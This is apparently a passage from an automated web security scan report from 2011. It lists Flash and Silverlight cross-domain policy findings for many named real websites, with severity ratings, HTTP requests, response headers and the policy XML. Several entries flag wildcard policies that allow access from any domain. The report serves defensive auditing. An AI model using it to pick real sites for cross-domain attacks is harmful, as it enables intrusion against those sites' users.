Host:   http://www.thomasnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thomasnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Last-Modified: Fri, 07 Sep 2007 14:01:38 GMT
ETag: "1856d0-1bc-13d87480"
Accept-Ranges: bytes
Content-Length: 444
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="www.whyabe.com" /><allow-access-from domain="whyabe.com" /><allow-access-from domain="realtimerfp.com" /><allow-access-from domain="www.realtimerfp.com" /><allow-access-from domain="sourceoneinc.com" /><allow-access-from domain="www.sourceoneinc.com" />
...[SNIP]...
7.544. http://www.tradekey.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tradekey.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:11 GMT
Server: Apache
Last-Modified: Sat, 04 Sep 2010 06:41:24 GMT
Accept-Ranges: bytes
Content-Length: 737
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="img.tradekey.com" />
<allow-access-from domain="img1.tradekey.com" />
<allow-access-from domain="img2.tradekey.com" />
<allow-access-from domain="www1.tradekey.com" />
<allow-access-from domain="ar.tradekey.com" />
<allow-access-from domain="cn.tradekey.com" />
<allow-access-from domain="es.tradekey.com" />
<allow-access-from domain="jp.tradekey.com" />
<allow-access-from domain="china.tradekey.com" />
<allow-access-from domain="int1.tkcdn.com" />
<allow-access-from domain="int2.tkcdn.com" />
...[SNIP]...
7.545. http://www.umich.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.umich.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.umich.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:44 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 22:50:37 GMT
ETag: "123f68-14d-49b7cb5e86940"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="president.umich.edu" />
...[SNIP]...
<allow-access-from domain="umich.edu" />
...[SNIP]...
7.546. http://www.verisign.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:35 GMT
Server: Apache
Set-Cookie: v1st=7CAA616EF17DECD4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
ETag: "28e9339-d5-49a38fa7a2e80"
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...
7.547. http://www.vimeo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 20:28:47 GMT
ETag: "749ee-15f-e842fdc0"
Accept-Ranges: bytes
Content-Length: 351
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:23:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="none"/>
...[SNIP]...
7.548. http://www.vistaprint.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vistaprint.com

Response

HTTP/1.0 200 OK
Content-Length: 92
Content-Type: text/xml
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=409EF4DB2236D7BA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

<cross-domain-policy><allow-access-from domain="apps.ezprints.com"/></cross-domain-policy>
7.549. http://www.walgreens.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walgreens.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walgreens.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 06 Aug 2009 18:25:09 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:00 GMT
Connection: close
Set-Cookie: akaau=1301751960~id=08f4223290173c8e1d54c33f982c09f3; path=/

<cross-domain-policy>
   <allow-access-from domain="img.walgreens.com"/>
   <allow-access-from domain="images.walgreens.com"/>
   <allow-access-from domain="dnbdap01.walgreens.com"/>
   <allow-access-from domain="mymachine.walgreens.com"/>
...[SNIP]...
7.550. http://www.xe.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224450647; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 05 Mar 2010 14:20:32 GMT
ETag: "2d0006-d5-6b072c00"
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="s.xe.com" />
</cross-do
...[SNIP]...
8. Silverlight cross-domain policy  previous  next
There are 22 instances of this issue:

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
8.2. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 01 Apr 2011 13:36:57 GMT
Expires: Fri, 01 Apr 2011 13:36:54 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83994
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
8.3. http://www.cbssports.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 20:50:52 GMT
Accept-Ranges: bytes
Content-Length: 458
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:25:08 GMT
X-Media: ws901-fe.tm
Connection: close
Content-Type: application/xml

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="*" />
<domain uri="http://*.akamai.net" />
<domain uri="http://*.g.akamai.net"/>
<domain uri="http://beyond.download.akamai.com" />
...[SNIP]...
8.4. http://www.coveritlive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.coveritlive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.coveritlive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Debian) PHP/5.2.5-3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8n
Last-Modified: Wed, 21 Oct 2009 03:57:31 GMT
ETag: "a7430f-145-47669fa5ec0c0"
Accept-Ranges: bytes
Content-Length: 325
Content-Type: application/xml
X-Cache-Lookup: MISS from web2.cil:80
Date: Sat, 02 Apr 2011 13:56:28 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...
8.5. http://www.intellicast.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 337
Content-Type: text/xml
Content-Location: http://www.intellicast.com/clientaccesspolicy.xml
Last-Modified: Thu, 11 Nov 2010 13:19:23 GMT
Accept-Ranges: bytes
ETag: "764b6fea381cb1:2092"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140a45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
8.6. http://www.nadaguides.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nadaguides.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.nadaguides.com

Response

HTTP/1.1 200 OK
Content-Length: 337
Content-Type: text/xml
Last-Modified: Fri, 26 Mar 2010 16:16:58 GMT
Accept-Ranges: bytes
ETag: "0f92dc2ffccca1:55ba"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-NADAGuides: NY#3
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
8.7. http://www.ncm.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 314

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*"/>
           </allow-from>
           <grant-to>
               <r
...[SNIP]...
8.8. http://www.opinionshere.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.opinionshere.com

Response

HTTP/1.1 200 OK
Set-Cookie: opinions_here=a500240$50$0$6$140b0403$1021b3a; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:58 GMT
Content-Type: text/xml
Last-Modified: Wed, 04 Nov 2009 22:13:43 GMT
Accept-Ranges: bytes
ETag: "65455129c5dca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:37 GMT
Connection: close
Content-Length: 297

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/
...[SNIP]...
8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.safelinkwireless.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.safelinkwireless.com

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: ISAWPLB{4DECF60D-BA16-4115-9714-1CF8AB2032B9}={64003EC6-801B-4F64-A518-5B565EEAD292}; HttpOnly; Path=/
Content-Length: 337
Date: Sat, 02 Apr 2011 13:43:48 GMT
Content-Type: text/xml
ETag: "073fa486d98c91:0"
Server: Microsoft-IIS/7.5
Accept-Ranges: bytes
Last-Modified: Thu, 26 Feb 2009 23:52:30 GMT
X-Powered-By: ASP.NET

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
8.10. http://www.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:43 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...
8.11. http://www.winbuyer.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.winbuyer.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.winbuyer.com

Response

HTTP/1.1 200 OK
Content-Length: 405
Content-Type: text/xml
Last-Modified: Thu, 17 Feb 2011 10:42:46 GMT
Accept-Ranges: bytes
ETag: "3ed2eb698fcecb1:bc6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:52 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
- <access-policy>
- <cross-domain-access>
- <policy>
- <allow-from http-request-headers="*">
<domain uri="*" />
...[SNIP]...
8.12. http://www.cbs.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Sep 2009 19:09:25 GMT
X-Real-Server: ws3224.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=299
Date: Sat, 02 Apr 2011 13:27:27 GMT
Content-Length: 654
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://cbs.com"/>
<domain uri="http://*.cbs.com"/>
<domain uri="http://*.bigspaceship.com"/>
<domain uri="http://vsallaccess.com"/>
<domain uri="http://*.vsallaccess.com"/>
<domain uri="http://*.vsallaccess.com.edgesuite.net"/>
<domain uri="http://*.vsallaccess.com.edgesuite.net"/>
...[SNIP]...
8.13. http://www.cnbc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 05:24:12 GMT
Via: 1.1 C aicache6
Content-Length: 533
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 13:26:05 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...
8.14. http://www.fidelity.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Wed, 16 Feb 2011 22:16:37 GMT
Content-Length: 449
ETag: "1c1-4d5c4cc5"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:33 GMT
Connection: close
Set-Cookie: MC=5LM7vGj3KIcaxyS0ZfIdqN7TCGcSAk2XJXEKAyjuIABNSAABqjMGBAAAAQAGBU2XJXEAP03; path=/; domain=.fidelity.com; expires=Sun, 01-Apr-2012 13:32:33 GMT
Set-Cookie: v1st=77844EBB51D035FB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...
8.15. http://www.indiatimes.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Dec 2009 03:54:10 GMT
ETag: "9d432e958383ca1:6ea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 778
Cache-Control: max-age=259144
Date: Sat, 02 Apr 2011 14:02:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.indiatimes.com"/>
</a
...[SNIP]...
<domain uri="122.166.10.43" />
...[SNIP]...
<domain uri="http://121.243.172.93" />
...[SNIP]...
8.16. http://www.msnbc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:08 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...
8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 408
Xonnection: Xeep-Alive
Content-Type: text/xml
X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:27:37 GMT
Date: Sat, 02 Apr 2011 13:27:37 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*">
<domain uri="http://*.stimulant.io"/>
<domain uri="http://*.nationalgeographic.com"/>
...[SNIP]...
8.18. http://www.sky.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sky.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Dec 2008 19:48:26 GMT
ETag: "c040-1a2-9c5ed680"
Accept-Ranges: bytes
Cache-Control: max-age=180
Expires: Sat, 02 Apr 2011 14:02:15 GMT
Content-Type: text/xml
Content-Length: 418
Date: Sat, 02 Apr 2011 13:59:15 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.sky.com"/>
<domain uri="https://*.sky.com"/>
